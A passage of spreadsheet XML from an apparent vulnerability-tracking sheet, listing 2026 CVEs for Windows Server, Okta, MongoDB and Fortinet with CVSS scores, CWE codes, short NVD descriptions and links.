        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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8" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S92"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T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S93"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T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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6" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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7" s="5" t="inlineStr"/>
